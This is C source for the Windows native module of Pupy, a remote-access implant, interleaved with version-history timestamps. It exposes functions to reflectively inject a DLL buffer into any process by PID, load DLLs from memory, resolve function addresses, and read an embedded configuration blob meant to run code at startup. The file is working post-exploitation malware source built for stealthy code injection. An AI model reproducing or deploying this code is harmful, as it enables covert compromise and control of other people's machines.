2015-09-21 19:53:37 +00:00
/*
2015-10-23 17:16:11 +00:00
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
2015-09-21 19:53:37 +00:00
*/
# include "Python-dynload.h"
# include <stdio.h>
# include <windows.h>
# include "base_inject.h"
static char module_doc [ ] = " Builtins utilities for pupy " ;
extern const char resources_library_compressed_string_txt_start [ ] ;
extern const int resources_library_compressed_string_txt_size ;
2016-05-05 10:46:02 +00:00
char pupy_config [ 40960 ] = " ####---PUPY_CONFIG_COMES_HERE---#### \n " ; //big array to have space for more config / code run at startup
2015-09-21 19:53:37 +00:00
extern const DWORD dwPupyArch ;
static PyObject * Py_get_compressed_library_string ( PyObject * self , PyObject * args )
{
return Py_BuildValue ( " s# " , resources_library_compressed_string_txt_start , resources_library_compressed_string_txt_size ) ;
}
static PyObject *
2015-10-23 17:16:11 +00:00
Py_get_pupy_config ( PyObject * self , PyObject * args )
2015-09-21 19:53:37 +00:00
{
2015-10-23 17:16:11 +00:00
return Py_BuildValue ( " s " , pupy_config ) ;
2015-09-21 19:53:37 +00:00
}
2015-10-23 17:16:11 +00:00
2015-09-21 19:53:37 +00:00
static PyObject * Py_get_arch ( PyObject * self , PyObject * args )
{
if ( dwPupyArch = = PROCESS_ARCH_X86 ) {
return Py_BuildValue ( " s " , " x86 " ) ;
}
else if ( dwPupyArch = = PROCESS_ARCH_X64 ) {
return Py_BuildValue ( " s " , " x64 " ) ;
}
return Py_BuildValue ( " s " , " unknown " ) ;
}
2015-10-14 15:58:43 +00:00
static PyObject * Py_reflective_inject_dll ( PyObject * self , PyObject * args )
2015-09-21 19:53:37 +00:00
{
DWORD dwPid ;
const char * lpDllBuffer ;
DWORD dwDllLenght ;
const char * cpCommandLine ;
PyObject * py_is64bit ;
int is64bits ;
if ( ! PyArg_ParseTuple ( args , " Is#O " , & dwPid , & lpDllBuffer , & dwDllLenght , & py_is64bit ) )
return NULL ;
is64bits = PyObject_IsTrue ( py_is64bit ) ;
2015-10-08 17:36:37 +00:00
if ( is64bits ) {
2015-09-21 19:53:37 +00:00
is64bits = PROCESS_ARCH_X64 ;
2015-10-08 17:36:37 +00:00
} else {
2015-09-21 19:53:37 +00:00
is64bits = PROCESS_ARCH_X86 ;
2015-10-08 17:36:37 +00:00
}
2015-09-21 19:53:37 +00:00
if ( inject_dll ( dwPid , lpDllBuffer , dwDllLenght , NULL , is64bits ) ! = ERROR_SUCCESS )
return NULL ;
return PyBool_FromLong ( 1 ) ;
}
2015-10-14 15:58:43 +00:00
static PyObject * Py_load_dll ( PyObject * self , PyObject * args )
{
DWORD dwPid ;
const char * lpDllBuffer ;
DWORD dwDllLenght ;
const char * dllname ;
if ( ! PyArg_ParseTuple ( args , " ss# " , & dllname , & lpDllBuffer , & dwDllLenght ) )
return NULL ;
if ( _load_dll ( dllname , lpDllBuffer ) )
return PyBool_FromLong ( 1 ) ;
return PyBool_FromLong ( 0 ) ;
}
2016-10-30 21:12:49 +00:00
static PyObject * Py_find_function_address ( PyObject * self , PyObject * args )
{
const char * lpDllName = NULL ;
const char * lpFuncName = NULL ;
void * address = NULL ;
printf ( " DEBUG 0: %s %s \n " , lpDllName , lpFuncName ) ;
if ( PyArg_ParseTuple ( args , " ss " , & lpDllName , & lpFuncName ) ) {
printf ( " DEBUG: %s %s \n " , lpDllName , lpFuncName ) ;
address = MyFindProcAddress ( lpDllName , lpFuncName ) ;
}
printf ( " DEBUG 2: %s %s %p \n " , lpDllName , lpFuncName , address ) ;
return PyLong_FromVoidPtr ( address ) ;
}
2015-09-21 19:53:37 +00:00
static PyMethodDef methods [ ] = {
2015-10-23 17:16:11 +00:00
{ " get_pupy_config " , Py_get_pupy_config , METH_NOARGS , " get_pupy_config() -> string " } ,
2015-09-21 19:53:37 +00:00
{ " get_arch " , Py_get_arch , METH_NOARGS , " get current pupy architecture (x86 or x64) " } ,
{ " _get_compressed_library_string " , Py_get_compressed_library_string , METH_VARARGS } ,
{ " reflective_inject_dll " , Py_reflective_inject_dll , METH_VARARGS | METH_KEYWORDS , " reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits) \n reflectively inject a dll into a process. raise an Exception on failure " } ,
2015-10-14 15:58:43 +00:00
{ " load_dll " , Py_load_dll , METH_VARARGS , " load_dll(dllname, raw_dll) -> bool " } ,
2016-10-30 21:12:49 +00:00
{ " find_function_address " , Py_find_function_address , METH_VARARGS ,
" find_function_address(dllname, function) -> address " } ,
2015-09-21 19:53:37 +00:00
{ NULL , NULL } , /* Sentinel */
} ;
DL_EXPORT ( void )
initpupy ( void )
{
Py_InitModule3 ( " pupy " , methods , module_doc ) ;
}